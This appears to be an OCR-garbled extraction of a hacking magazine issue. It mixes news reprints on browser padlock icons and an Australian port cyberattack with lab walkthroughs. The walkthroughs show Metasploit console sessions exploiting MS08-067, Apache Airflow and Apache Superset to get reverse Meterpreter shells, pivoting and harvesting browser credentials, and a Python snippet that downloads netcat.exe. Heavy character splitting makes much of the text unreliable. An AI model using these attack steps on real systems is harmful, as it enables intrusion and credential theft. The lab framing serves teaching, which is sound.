Professional Documents
Culture Documents
ti
on 6 I
ssue11 Learn how Bl
ack HatHackers hack
7t i
psfrom cybersecuri
ty expertt
ost
ay safe
from phishi
ng scams.
To
Advertise
w ith us
Contact:
adm in@ hackercoolm agazine.com
3
Then you w ill know the truth and the truth w ill set you free,
fohn 8 :32
E ditor'sN ote
Edition 6 Issue 11
II
TatHackercoolMagazine
wi
sh you a
Merry Christmas
and a
-PR OOFPOIN T
6
IN SIDE
Seew hatourIlackercoolMagazi
ne'sN ovember2023 Issuehasi
nstoreforyou.
1. B l
ack H atH acking Scenario:
Part2
2. CyberSecuri
ty:
Thevastmajorityof ushavenoideaw hatthepadl
ock i
cononourinternetbrow ser
i
s- and i
t’sputting usatri
sk.
3. MetasploitThisMonth:
L at
estApache Modules
4. (]yberW ar:
Majorcyberatt
ack onAustralianportsuggestssabotagebya’foreignact
or".
5. E xploitW riting: I
’art3
Dow nloadingfi
lesand payl
oads.
6. (InlineSecuri
ty:
Phishingscams: 7 safet
ytipsfrom acybersecurityexpert.
Dow nloads
< >t
herUsefulR esources
7
Company'
s Network Fi
rewal
l
Attacker'
s Network Fi
rewal
Targetnetwork
L et’sseei
tpractically. Fort
his, Ii
nst
allanotherPFSense Firew allto actasGatew ay fortheat
tac-
ersystem. H ere aretheW AN and L AN netw ork of thetargetsystem’sfi rew al
l.
Starting syslog... done.
Starting CR ON ... done.
pfSense 2.7 .0-R E L E ASE and64 Ued Jun 28 03 : 5 3 : 3 4 UTC 2023
B ootup conplete
FreeB SD /
and64 (pfSense.hone.arpa) (ttyv0)
UMki
are U irtual M achine - N etgate D evice ID : 2cla8 5 168 blc5 5 3 8 fa8 0
E nter an option: |
The targetsystem’sIP addressi
s192.168 .223.6.
FreeB SD /
aMd64 (pfSense.hone.arpa) (ttyv0)
UMw are U irtual M achine - N etgate D evice ID : 5 7 2b5 d2f4 03 1e3 be08 90
E nter an option: |
heattackersystem’sIP addressi
s192.168 .110.5
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 1 2 7 .0.0.1 /8 scope host to
valid I f t forever preferredlft forever
inet6 ::1 /1 2 8 scope host
valtd_ lft forever preferred_ lft forever
2 : ethO : < B R 0AD CAST,M ULTICAST,UP,LOW ER _UP> mtu 1 500 qdtsc fq
_ codel state UP group defau lt ql en 1 000
I tnk/ether 00:0c:2 9 :9 3 :da:f0 brd f f :f f :f f :f f :f f :f f
inet 1 9 2 .1 6 8.1 1 0.5/2 4 brd 1 9 2 .1 6 8.1 1 0.2 55 scope global d
ynamte ncqfretrxroJTfi 6 th0
valtd_ lft 7 1 49 sec preferred_ lft 7 1 49 sec
tnet6 fe8 0::8 aff:8c6 :5ba:be9 8/6 4 scope link nopreftxrou t
e
valtd_ lft forever preferred_ lft forever
AttackerSy stem
I
P : 192.168.110.5
T argetsy stem
IP Address: 192.168.223.6
o, Iload thei
ns()8 067 moduleand thetargeti
sindeed vulnerable. Isetotherreq uired opti
ons.
A ccording t
o Crowd S trike'sglobalthreatreport2023, B lack HatHackersused
protocolssuch asR D P , S S H and S M B [orlateralmovementin cloud environments.
msf 6 > u se 0
[*] N o pay lo ad c o nf i g u red, def au lti ng to w i ndo w s/ meterpreter/
reverse_tc p
msf 6 explo i t(w tndo w s/ smb / ms08 067_netapt) > set rho sts 192, 16
8.249.160
rho sts => 192.168.249.160
msf 6 explo i t(w tndo w s/ smb / ms08_067netapt) > c hec k
[+] 192.168.249.160:445 - The targ et i s vu lnerab le.
msf 6 explo i t(w tndo w s/ smb / ms08_067_netapt) > set Ipo rt 81
Ipo rt => 81
msf 6 explo i t(w tndo w s/ smb / ms08_067_netapt) > |
t
eral
ltheoptionsareset
, Iexecutethemodule and theresulti
sgi
venbelow .
msf 6 explo tt(w tndo w s/ smb / ms08_067_netapt) > ru n
Fi
rewal
l/ NAT / P ortForward / Edi
t
Edi
tRedi
rec
tEnt
ry
D i
sabl
ed Q D i
sabl
e thi
s rul
e
No R D R (
NO T) Q D i
sabl
e redi
recti
on fortraffi
c m atchi
ng thi
s rul
e
Thi
s opti
on i
s rarel
y needed. D on'
tuse thi
s wi
thoutthoroughknowl
edge of the i
m pl
icati
ons
I nterface W AN
Choose whi
chi
nterface thi
s rul
e appl
ies to. In m ostcases '
W AN i
s speci
fi
ed.
Address Fami
ly IPv4
S el
ectthe InternetP rotocolversi
on thi
s rul
e appl
ies to.
P rotocol TCP/UD P
Choose whi
chprotocolthi
s rul
e shoul
d m atch In m ostcases ’TCP i
s speci
fi
ed.
S ource
O D i
spl
ayAdvanced
D esti
nati
on portrange O ther 81 O ther 81
Custom Custom
port’.i
ng the desti
nati
on of the packetforthi
s mappi
ng The I o'hel
d may be l
eftem pty if onl
y mappi
ng a si
ngl
e port
R edi
recttargetIP Si
ngl
e host 1 9 2 1 6 8 1 1 05
Address
nk l
ocaladdresses scope (
fe80:*)to l
ocalscope (1 )
R edi
recttargetport 81
Custom
meterpreter > sy si nf o
Co mpu ter : ADMIN -FFBE 8F88E
OS : W i ndo w s XP (5.1 Bu i ld 2600, Servi c e Pac k 2)
Internet
AttackerS y stem
IP : 192.168.110.5
T argetsy stem
IP Address: 192.168.223.6
LateralM ovement
InR ealw orld, B lack H atH ackershack t o getaccessto high-valueasset s. Thiscaninclude
sensitivedata, source code, and otherimportantinformation. R arely, asyst em tow hich B lack H at
H ackersgain i niti
alaccesscontainshi gh-value asset
smentioned above. So B l ack H atH ackersaft e-
rgaining i niti
alaccessinanetw ork t riestomove around thenetw ork insearch of high valueasset
-sand fi nall
y take controlof theentire netw ork. Thisi sknow nasL ateralMovementorPivoti ng.
They usevarioustechniquest o achievethis. The firststep i
nlateralMovementi sof course
perform reconnaissance togatherinformationaboutthenetw ork devices. To gatherinformationa-
boutthetargetnetw ork, B l ack H atH ackersperform st epsl ikeview ing theAddress R esolution
Protocol(AR P) table, view ingnetw ork interfaces, netw ork connectionsand thetargetnetw ork’s
routingtable.
L et’sseei tpractical
ly. < 'nthetargetnetw ork, Ihave SYST EM l evelME TI R PR E TE R accesson
oneof thesyst ems( Iam talking aboutourtargetsystem, buddy). Meterpreterhasmany comman
dsbuilti nto perform theabove-mentioned reconnai ssance.
Command D escription
L etsfi
rstview the AddressR esolution Protocol(Al'P) table of thetargetsyst
em.
AR P cache
m eterpreter >
L et’sseei
f thetargetsyst
em belongsto aDualhomed netw ork orSinglehomed netw ork. A
computerinaDualhomed netw ork i sconnected to t
w o netw orks. Forexample, the I senseFi
re
w allw eareusinghere (W AN & L AN ). The ‘ipconfig’ command inW indow srevealsthenetw ork
interfacesthe system isconnected to.
m eterpreter > ipconfig
I nterface 1
I nterface 2
m eterpreter
Thetargetsyst
em belongstoaSingle lomed netw ork. N o luck here. N ext, let'sview therouting
t
abl
eon the kirgetsystem.Intheabove image, you canseethattherei sonly one IP addressw hich
m eterpreter > route
I P v4 network routes
M atchi
ng M odul
es
M odul
e options (post/m u lti/m anage/au torou te):
msf 6 post(
m u ltt/m anage/au torou te)
18
Ihave to do to execute t
hismodule i
sto setthesessionID of themeterpreter.
m sf6 post(
m u ltt/m anage/au torou te) > set session 1
session => 1
m sf6 post(
m u ltt/m anage/au torou te) > run
The route i
sadded, N ow , w ecan perform aportscanof t
hisdevice. H ere Iam scanning forsome
common partsto beopen on t hi
sdevice.
m sf6 post( m u ltt/m anage/au torou te) > use au xiliary/scanner/por
tscan/tcp
m sf6 au x iliary( scanner/portscan/tcp) > set ports 8 0,2 1 ,2 3 ,2 5
ports => 8 0,2 1 ,2 3 ,2 5
m sf6 au x tliary( scanner/portscan/tcp) > run
A ctive sessions
1 1 /1 6 /2 02 3 01 :2 1 PM <D IR >
1 1 /1 6 /2 02 3 01 :2 1 PM <D IR >
1 1 /1 6 /2 02 3 1 1 :48 AM <D IR > Common Files
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > ComPl us Applications
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > I nternet E xplorer
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > M essenger
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > m icrosoft frontpage
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > M ovie M aker
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > MSN
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > MSN G ami ng Zone
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > NetM eeting
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > O nline S ervices
1 2 /04/2 02 3 02 :58 PM <D IR > O pera,
1 1 /1 6 /2 02 3 1 1 :44 AM <D IR > "O utlook E xpress
1 1 /1 6 /2 02 3 1 1 :48 AM <D IR > VM ware
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > Wi ndows M edia Player
1 1 /1 6 /2 02 3 1 1 :43 AM <D IR > Wi ndows NT
1 1 /1 6 /2 02 3 1 1 :45 AM <D IR > xerox
0 File( s) 0 bytes
1 8 D tr(s) 1 8,82 7 ,3 09 ,056 bytes free
M atchi
ng M odul
es
no
rm al No le credential gatherer
M odul
e options (
post/w indow s/gather/credentials/ie):
Vi
ew the f u ll modul
e info w ith the info, or info -d command.
msf6 post(
w indow s/gather/credentials/ie) > |
m sf6 post(
w indow s/gather/credentials/ie) > run
[*] D ownl
oadi
ng C:\D ocum ents and S ettings\Adm inistrator\L ocal
[*] D ownl oadi ng C:\D ocum ents and S etttngs\Adm intstirator\L ocal
S etttngs\H tstory\H tstory.I E 5 \index.dat
[*] le I ndex.dat downl oaded
[+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9 05 defa
u lt_ 1 9 2 .1 6 8.2 2 3 .6 _ I E tndex.dat_ 9 6 0486 .dat
[*] D ownl oadi ng C:\D ocum ents and S ettingsX Adm inistratorX Local
S ettingsX H istoryX H istory.I E 5\M S H l st01 2 02 3 1 1 1 6 2 02 3 1 1 1 7 \i
ndex.
dat
[*] le I ndex.dat downl oaded
L+] File saved to: /hom e/kali/.m sf4/loot/2 02 3 1 2 04043 9 O 6 _ defa
ult_ 1 9 2 .1 6 8.2 2 3 .6 _ I E index.dat_ 86 3 7 45.dat
M atchi
ng M odul
es
# Name D isclosure D at
e R ank Check D escription
M odul
e opti
ons (
au xiliary/server/socks_ proxy):
Au xiliary action:
Network Settings
Confi
gure how Fi
refox connects to the i
nternet. Learn m ore S etti
ngs...
Connecti
on S etti
ngs
Confi
gure P roxyAccessto the I nternet
No proxy
O M anualproxy configurati
on
Uk I P-* I I J a p
P ort
Autom ati
c proxy configurati
on UR L
R el
oad
H el
p Cancel OK
Confi
gure P roxyAccessto the Internet
No proxy
Auto-detectproxy setti
ngs forthi
s network
M anualproxy confi
gurati
on
Al
so use thi
s proxy forHTTPS
J S O CKS V4 U SO CKS yb
Autom ati
c proxy confi
gurati
on UR L
R el
oad
No proxy for
H el
p Cancel OK
Logi
n to ptS ense
S IG N IN
U sernam e
adm i
n
0 d 1 9 2 .1 6 82 2 3 3
Kab Li
nux Kal
iTool
s * Kal
iD ocs X Kab Forum s c\ Kal
lNetH unter E xpl
oitD B G oogl
e H acki
ng D B O ftSec
S tatus/
S ystem VM ware Vi
rtualM achi
ne
Netgate D evi
ce ID 2 d «851 6 fl
blc553 8faB 0
NE TG ATE AND pl
S ense CO M M UNITY S UP P O R T R E S O UR CE S
B IO S Vendor P hoeni
x Technol
ogi
es LTD
Versi
on 6 00
flyou purchased youtpfS ense gateway fi
fewal
lappl
iance from Nei
gate and el
ected
ease D ate W ed Jul22 2 02 0
R el
Com m unity S upportatthe poi
ntof sal
e ori
nstal
led pfS ense on yourown
Versi
on 2 .7 0 R ELEASE (
am d6 4) hardware, you have access to vari
ous com m uni
ty supportresources Thi
sincl
udes
buil
ton W ed Jun 2 8 03 S3 3 4 UTC 2 02 3 the NE TG ATE R E S O UR CE LI B R AR Y
FreeB SD 1 4 0-CUR R E NT
YPu al
so m ay upgrade to a Netgate G l
obalTechni
calAssi
stance Center(
TAC)
S upportsubscri
pti
on w e re aNvays on'O urteam i
s staffed 2 4x7 x3 6 5 and
com m i
tted to del
iveri
ng enterpri
se cl
ass worl
dwi
de supportata pnee poi
ntthati
s
V erw n i
nform ati
on updated atM on D ec 4 8 55 3 8 UTC 2 02 3 £?
m ore than com peti
ti
ve when com pared to others n ourspace
CPU Type I ntel
fR )CoccfTM )i
7 2 6 00 CPU 3 40G H z
• Upgrade YourS upport • Com m uni
ty S upportR esources
AES NtCPU Crypto Yes (
inacti
ve)
Q AT Crypto No • Netgate G lobalS upportFAQ • OfficialpfS ense T raining by Neig stt
---j
Voi
la, L oginsuccessful
. W enow ow ned t
heFi
rew al
ltoo.
I nternet
AttackerS ystem
IP:1 9 2 .1 6 8.1 1 0.5
Targetsystem
IP Address:1 9 2 .1 6 8.2 2 3 .6
W ehavesuccessfullyperformed L ateralMovementtoo. N ow , w ecansetanyrulesw ew antand
do w hateverw edo. B utfornow , let’sJustvi
ew therulet
hatexposed W indow sXP t
o internet
.
KaiLi
nux Kal
iTool
s • Kal
iD ocs \ Kal
iForum s c Kab NetH untef * E xploit-D B G oogl
e H acki
ng D B
sl
ern
iM I tV ftH f
Fi
rewal
l/ NAT / I ©
>S Li
nked ru k
pfSense Netqate Vi
ew l
icense
The vastm ajority o ushave no idea whatthe padlock icon on our internet
browser is- and it's putting usatrisk
CY B E R SE CUR ITY
FionaCarrol l a numberof q ue stionsabouttheinternet. Some
leaderi nH umanComputerInteraction, ’ardiff3 ^ bachelorsdegree^orabove
and 22% had acoll egecert i
ficate, w hi lethe
Metropolitan IUni versi
ty
remainderhad no furthereducation.
Oneof ourq uest ionsw as: "Onthe loogle
Doyou know w hatthepadlock symboli nyour
Jhromebrow serbar, doyou know w hatt he
internetbrow ser’saddressbarmeans? If not,
you’renotal one. N ew research by mycolleague p adlock i
co n re pre sents/me ans? =
-sand Ishow sthatonly5% of UK adult sunderst Of the 46 3 w h o resp ond ed, 63% stat
ed the y
knew , orthoughttheyknew , w hatt hepadlock
-and thepadlock'ssi gnifi
cance. Thisi sathreat
i<) ouronlinesafety. sy mb ol on the irw eb b row serme an t, but on l
y
7% gavethecorrectmeaning. R espondentsgave
Thepadlock symbolonaw eb brow sersi mply
usarangeof incorrectinterpretations, believing
meansthatthedatabeing sentbetw een t hew eb
serverand theuser’scomputeri sencrypted and amo ng o thertilin gs that the pad lock s
ignified a
securew eb pageorthatthew ebsit ei ssafeand
cannotberead byothers. B utw henw easked
doesn’tcontainany virusesorsuspiciousl i
nks.
peoplew hatt hey thoughti tmeant, w ereceived
Othersbelieved t hesymbolmeansaw ebsit ei s
anarray of incorrectansw ers.
"trustw orthy=, isnotharmful, ori sa"genuine=
Inourstudy, w easked acrosssecti ono 528
w ebsite.
w eb users, aged betw een 18 and 8 6yearsof age,
(C ont'd on nextpag e)
■
N otunderstanding symbolsl i
kethepadlock N etscape, tried to outdo each otherw it h faster,
icon, canpose problemst o internetusers. These betterand more uniq ue products. *1Ieraceto b-
include increased security ri sksand simply hind- edistinctmeanttherew asinconsistencybetw een
ering effecti veuseof the technology. products.
Ourfi ndingscorroborateresearch by Google
itself, w ho i nSeptember, replaced thepadlock InternetSafety
iconw it h aneutralsymboldescribed asa<tune
icon=. In doing so, Google hopesto eradicate H ow ever, introducing distinctbrow serdesigns
the misunderstandingsthatthepadlock icon has canlead to userconfusion, misunderstanding
afforded. and afal sesenseof security, especiallyw hen i tis
H ow ever, Google'supdate now raisesthe now w i dely know nthatsuch inconsistency can
q uestion astow hetherotherw eb brow sercomp- breed confusion, and from that, frustrat ion and
aniesw i lljoin forcest o ensure theirdesignsare lack of use.
uniform and intuiti veacrossal lplatforms. Asanexperti nhuman-computerinteraction, i t
isalarmingtome thatsomebrow sercompanies
W eb browserevol ution continueto disregard established guidelinesfor
usability.Inaw orld w here w eb brow sersopen t h
W ithoutadoubt, thebrow ser, w hich i sour edoorsto potentiallygreatersocietalri sksthan
pointof entry t o thew or p f j hu ma n -c o mp ut er 016 offline world’ i s
an ex er n
-Idw idew eb, comesw it h . . . . . crucialto establish a
alotof responsibility i nteraction, iti salarmingt o methatconsistentapproach
onthepartof w eb com-5 0 w e br owsercompaniescontinuet o foraddressing these
panies. It’show w enow _ >»• i » r dangers.
vi tw eb pages, so the di
si sregard establishedguidelinesjor Asaminimum, w e
brow serhasbecome anintegralpartof us ability." need w eb brow sercompaniestojoin
ourdaily l ives. forcesi naconcerted efforttoshield users, orat
It'sintriguingto look back and tracethe thevery l east, heighten theiraw arenessregardin
evolutionof thew eb’sdesignfrom the early g potentialonline ri sks. Thisshould include for
1990sto w herew earetoday. Creatingsoftw are mulating one unified designacrossthe board
thatpeoplew anted to useand found effecti ve thataffordsanenriched and safeuserexperienc-
w asattheheartof t hi
sevolution. The creation e.
of functioning, sat isfying, and mostimportantly,
consistently designed userinterfacesw asanimp This
ortantgoalinthe 1990s. In act, there w asa
drivei nthoseearly dayst o createw eb interface
designsthatw ereso consistentand int uitive that A rticle
usersw ould notneed to think too much about
how they w ork.
N ow adays, it’sadifferentst orybecause the first
challengei scentred onhelping people t o think
before they interactonline. Inli ghtof t his, i
tsee
msbizarre thatthe designof thew eb brow seri n appeared
2023 st illaffordsuncertainty through i t
sdesign.
W orsest ill, thatitisinconsistently presented
acrossi tsdifferentproviders. in
Itcould be argued thatt hisstemsfrom the
brow serw arsof themi d-1990s. 1hat’sw hen the The Conversation
likesof Microsoftand formersoftw arecompany,
Startingfrom January 12024
I[ackercoolMagazinew i llbe leavingY outube soonas
mostof thevideosw eareposting arebecomingvict i
ms
of "contentviolation" (obviously). W e arefindingi
t
difficultto maintain (li
estandard oIvideosand adhere t o
Y outube'scontentpoli cies.
H ackercoolMagazinew i l
lalso be leaving Pinterest
starting iiom'iiiesamedatementionedabove.
I:vou areibllow ingusany of theabovesocialmedia
channels, w ereq uestyou to shi
fttoourothersocial
mediachannels.
LatestApache M odules
Apache Airfl ow i
sanopen-source toolthati sused fororchestration o: data pipelinesorw orkflow -
s. W orkflow sand datapipelinesare usefulincreat ingvisualizationsof salesnumbersof the previo
-usday forexample. Iti sused byAdobe, Adgen, Snapp et c.
The above-mentioned versionsof Apache Airfl ow softw arehaveanunauthenticated command
injectionvulnerability. Thisvulnerability i saresultof tw o criticalvulnerabilities. The fi
rstone is
CVE-2020-1197 8 w hich i sanauthenticated command injectionvulnerability i nthe<example_trigg
-er_target_dag=.
The second one i sCVE-2020-13927 vulnerability and t hisisthe defaultsetting of Airflow 1.10.10
thatall ow sunauthenticated accessto Airfl ow E xperimentalR ES'! API. ThisR E ST APIall ow s
anyone to perform maliciousactionsl ikecreatingvulnerable DAG above.
ICombiningtheset w o vulnerabilities, attackerscan perform remote code execution. L et'ssee
how thismodulew orks. W ehavetested t hison Apache Airflow 1.10.10running asadocker
ontainer. Thecompose fileof thiscan bedow nload from theli
nk gi
veninourDow nloadssect
io-
. L et
l ’ssetthetargetfi
rst
. Startthecontainer.
— -( kali® 2 1 2 d )- -/airflow ]
$ docker-com pose up
Creating network "airflow defau lt" w ith the defau lt driver
P u lling x-ai rflow-com m on ( apache/airflow :1 .1 0.1 0)...
1 .1 0.1 0: P u lling from apache/airflow
c49 9 e6 d2 56 d6 : D ownl oadi ng [=========================================
========> ] 2 7 .09 M B /2 7 .09 M B ete
fcd8 fd2 cl41 4: D ownl oad com pl ete
========> ] 2 6 .3 8M B /2 6 .54M B ete
a849 50f3 9 508: D ownl oad com pl ete
] 1 .7 7 4M B /2 .1 8MB
40d9 fd6 9 f2 9 9 : W aiting
57 5a9 0dc441 8: W aiting
b2 d041 4a4eae: W aiting
43 3 7 a8e82 6 e8: W aiting
e3 47 1 0f1 57 f2 : W aiting
alcca2 542 086 : W aiting
Thetargeti
sready. N ow , load theApache_Airflow _R CE module.
"1'heimportanceof epist
emicsecurityand cybersecurityi snow comparablet
othatof
nationalsecurity^ -R ogerS pitz
msf6 > search airflow
M atchi
ng M odul
es
M odul
e options (
exploit/linu x/http/apache airflow dag rce):
E xploit target:
I d Name
—— ——■■»
0 Uni x Command
Setal
lthereq uired optionsand seei
f thetargeti
sindeed vulnerable.
msf6 ex ploit( linu x/http/apache_ airflow _ dag_ rce) > set rhosts 1 9 2 .1 6 8
.1 6 .2
rhosts => 1 9 2 .1 6 8.1 6 .2
m sf6 ex ploit( linu x/http/apache_ airflow _ dag_ rce) > check
[*] 1 9 2 .1 6 8.1 6 .2 :8080 - The target appears to be vu lnerable.
msf6 ex ploit( linu x/http/apache airflow dag rce) > |
hetargeti
sindeed vulnerable. Aft
ersett
ing al
ltheoptionsexecute the module.
msf6 ex ploit( linu x/http/apache_ airflow _ dag_ rce) > set I host 1 9 2 .1 6 8.
1 6 .1
I host => 1 9 2 .1 6 8.1 6 .1
msf6 ex ploit( linu x/http/apacheairflow _ dag_ rce) > run
)nce, dockerimage i
screated, create ausernamed ‘‘admin=.
W AR NING
\ ' w ™ 9 L J
।— ( kali© 2 1 2 d)- -
I— s 1
Il
iet argeti
sready. L oad tl
ieaiixiliary/
gather/
apache_superset_cookie_sig_prive_escmoduleand
load thereq uired opti
ons.
m sf6 > search su perset
M atching M odul
es
# Name D isclosu
re D ate R ank Check D escription
"S ecurit
yused t
obean inconveniencesomet
imes, butnow itsanecessi
tyallt
he
ti
me.
"
39
m sf6 au xiliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set rho
sts 1 7 2 .1 7 .0.2
rhosts => 1 7 2 .1 7 .0.2
m sf6 au x iliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > check
[- M sf::O ptionV alidateE rror The follow ing options failed to validat
e: USER NAM E, PASSW OR D
m sf6 au xiliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set use
rname adm i n
usernam e => adm i n
m sf6 au x iliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set pas
sword adm i
password => adm i
m sf6 au x iliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > set pas
sword adm i n
password => adm i n
m sf6 au xiliary( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > check
[ 1 7 2 .1 7 .0.2 :8 08 8 - The target appears to be vu lnerable. Apache Su
pset 2 .0.0 is vu lnerable
m sf6 au x iliary( gather/apache_ su perset cookie_ sig_ priv_ esc) > |
t
eral
ltheoptionsareset
, executethemodule.
m sf6 au x iliary(
gather/apache_ su perset_ cookie_ sig_ priv_ esc) > run
[*] R unning m odule against 1 7 2 .1 7 .0.2
M atching M odul
es
# Name D isclosu
re D ate R ank Check D escription
I nteract w ith a m odul e by name or index. For exam ple info 1 , use 1 o
r use ex ploit/linu x /http/apache su perset cookie sig rce
m sf6 > use 1
[*] Using configu red payload python/m eterpreter/reverse tcp
m sf6 e x p lo it(
linu x/http/apache_ su perset_ cookie_ sig_ rce) > show optio
ns
M odul
e options (
ex ploit/linu x /http/apache su perset cookie sig rce):
"Youknow something i
swrongwhen thegovernmentdeclaresopeningsomeone
el
se'smaili
safelony butyourinternetactivity i
sfairgamefordata collecting”
-E.A .B ucchianeri
P ayload options (
python/m eterpreter/reverse tcp ):
E xploit target:
Id Name
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > set rhosts
1 7 2 .1 7 .0.2
rhosts => 1 7 2 .1 7 .0.2
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > check
[-] M sf::O ptionV alidateE rror The follow ing options failed to validat
e: USER NAM E, PASSW OR D
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > set userna
me adm i n
usernam e => adm i n
m sf6 exploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > set passwo
rd adm i n
password => adm i n
m sf6 ex ploitC linu x/http/apache_ su perset_ cookie_ sig_ rce) > check
[*] 1 7 2 .1 7 .0.2 :8 08 8 - The target appears to be vu lnerable. Apache Su
pset 2 .0.0 is vu lnerable
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > |
Username P assword
adm i
n $ pbkdf2 -sha2 56 $ 2 6 00O O $ NE VnY2 l
4W E E ybl
pVVW dqW Q $ ja7 2 Q cI0T
M P H tCeVm IH zIG O TgB yl lpW hIR qwpCyQ uTk
m eterpreter > |
m eterpreter > syyysinfo
[-] Unknown command: syyysinfo
m eterpreter > sysinfo
Computer : 45f5ce6 fda7 f
OS : Linux 5 .1 0.0-kaU7 -am d6 4 #1 SMP D ebi
an 5 .1 0.2 8 -lka
H l( 2 02 1 -04-1 2 )
Architectu re : x6 4
System Language :C
M eterpreter : python/linu x
m eterpreter > getu id
S erver username: superset
m eterpreter > |
Asreaderscansee, w esuccessfull
y gotameterpretersessionon thetargetsyst
em.
M ajor cyberattack on Australian portssug g estssabotag e by a ’
foreig n state
actor\
CY B E R W AR
David Tuffley/ Ihelatestmedia reportssuggestcargo could be
SeniorL ecturerinApplied Ethics& stranded atthe portsforseveraldays. Australian
FederalPol iceand theAustralian CyberSecurit -
CyberSecurity, Griffit
h Universit
y
y (-entreare investigating thesource and nature
of theattack, deemed a<nationally significant
A seriouscyberattack hasdisrupted operations
incident= by federalcybersecurity coordinator
atseveralof Australia’slargestports, causing del
Darren Goldie.
aysand congestion. L ateon 1riday, portoperate
-rDP W orld detected an IIbreach thataffected
criticalsyst emsused t o coordinate shipping acti v
Is th er e evidenc e of this being a
-it
y.
m ali
c i
ous at tack ?
DP W orld i sone of Australia’slargestportope
Ehetiming, scaleand impactof the disruption
rators, handling approximately 40% olthe nation
do suggestthisw asatargeted attack.
’scontainertrade acrossterminalsi nB risbane,
Itoccurred on aFriday night, w hen moststaff
Sydney, Melbourneand F:remant le.
w ere off duty and l
essli kelyto noticeorrespond
DP W orld reacted q uickly tocontain the
to theincident. The targetw asamajorportoper
breach, includingshuttingdow naccesstotheir
atorthathandlesasi gnificantshareof Australia’s
portnetw orksonland, to preventfurtherunauth
trade and commerce. Such anattack canhave
-orised access. Thismeansthey essenti ally <pulle
seriousconseq uencesforAustralia’seconomy,
-dtheplug= on theirinternetconnection t o li
mit
security and sovereignty.
possible furtherharm.
The identitv and motive of theattackersare
D I’ W orld seniordirectorB lakeTierney said
notyetknow n, buttheski ll
sneeded to mount
itisst illpossibleto unload containersfrom ships
such anattack suggesta forei gnstateactortrying
, butthe trucksthattransportl i
recontainerscan
to undermine Australia’snationalsecurity or
notdrive i noroutof theterminals. Thisi sapre
economic interests.
cautionw hen theful lextentof adata breach i s
Inrecentyears, cyberattackson portsand shippi
notknow n.
C ont’d on nex tpag e)
-nghave become more common. Forinstance, and adviceto DP W orld and otheraffected parti
inFebruary 2022, severalE uropean portsw ere -esthrough theCri ticalInfrastructure Centre and
hitby acyberattack thatdisrupted oi lterminals, theTrusted Information Sharing N etw ork. Tli es-
Inanotherincidentearly thisyear, aransom egovernmentagenciesareeq uipped toprovide
-w areattack on maritimesoftw areimpacted mor timely supporti ntimesof cri sis.
-ethan 1,000ships. Also i nJanuary 2023, the
Portof L isbonw rastargeted by aransomw are How can we preventfuture
attack w 'hich threatened thereleaseof portdata. attacks?
These incidentshighlightthevulnerability of
themaritime industry to cyberthreatsand the 1l i
eDP W orld cyberattack i saclearw arning of
need forincreased cybersecurity measures. theri sksto theessentialtransportation services
thatpow erAustralia’strade and commerce.
How m i qhtthe attack have Portsaredifficulttarget s. To cause such a
happened? disruption, the attackersw ould have tobe hi ghly
skill
ed and plan ahead. Il efactportshavebeen
So far, thedetailshave notbeen disclosed. B uisuccessfull y hacked more than oncei nrecentl i
-
based onw hatw eknow aboutsimilarcases, i ti s messuggeststhreatsfrom cybercriminalsare
possiblethe attack took advantage of vulnerabili- steadil y increasing.
-ti
es in DP W o r
ld ’ssyste"p f
- or difficultt
s ar e arP et
JJ
S .To.
. Fo r c omp anies such as
m. 1hese vulnerabilities ° D P W orld, it’simportant
are normally closed by causesuchadisruption, to continuously monitor
applyinga<patch= inthe _ _
»_j__i _
i n
__e
_tw _o
_ _rks_i
_ n_r
_ _ea_
_l_t
ime
__,
samew ay yourbrow ser theattackerswouldhavet obe promptly installsecurity
needsupdating every
w eek ortw o t o keep it highlyskilledandplan ahead.'
safefrom being hacked. from each other.
Once hackersgained access, thebreach l i
kel y Dedicated, w ell-resourced cybersecurity
pivoted toinfilt rat etheoperationalsystemsthat personnel, employee training and incidentrespo
directly manage portacti vit
ies. Failingtoisolate -useplansarekey t o improvingpreparedness.
and secure thesecontrolnetw orksallow ed the Portsshould cl osel
y coordinatew i t
h govern
incidentto impactoperations. -mentcounterpartsand industry partnersonint e
Itisal so possible accessw asgained viaa lligencesharing and cybersecurity bestpractices,
phishing emailoramaliciousli nk. Such anattac Cyberthreatsevolveso q ui ckly, alw aysbeing pre
-kmay havetricked anemployee oracontractorpared forthe latestone i sasi gnificantchallenge,
into opening anattachmentorclickingon ali nk Foraseamlessfl ow of goods, w eneed tobe
thatinstalled malw areorransomw are on the constantly vigilantof potentialthreatst o our
netw ork. supply chain infrastructure, hi slatestattack i
s
an urgentreminderthatcyberresiliencemustbe
Now what? atop priority.
So, l
et’sbeginw i
ththeurl
lib module.
1 ,url
li
b modul
e
W ew i
llcontinuefrom thesame lie ‘\:rst..exploit thatw el
ei att
heend of Part
-2.
GNU nano 7 .2 f irst exploit
print(
shu tit.whi
ch(
"pert"))
H el
p W rite O ut® W here I s 3 Cut E xecute
E xit R ead Fileffl R epl
ace H P aste Ju stify
Importurl
lib moduleand editthecode asshow nbel
ow .
s
____________________________________________________________ J
GNU nano 7 .2 first exploit
im port u rllib
from u rllib i m port request
UR L="https://eternallybored.org/m isc/netcat/netcat-W i
n3 2 -1 .1 1 .z |
result=request.urlretrieve(
UR L, "netcat.exe")|
)2 2 2 vm)-[-/python exploit
first_ exploit
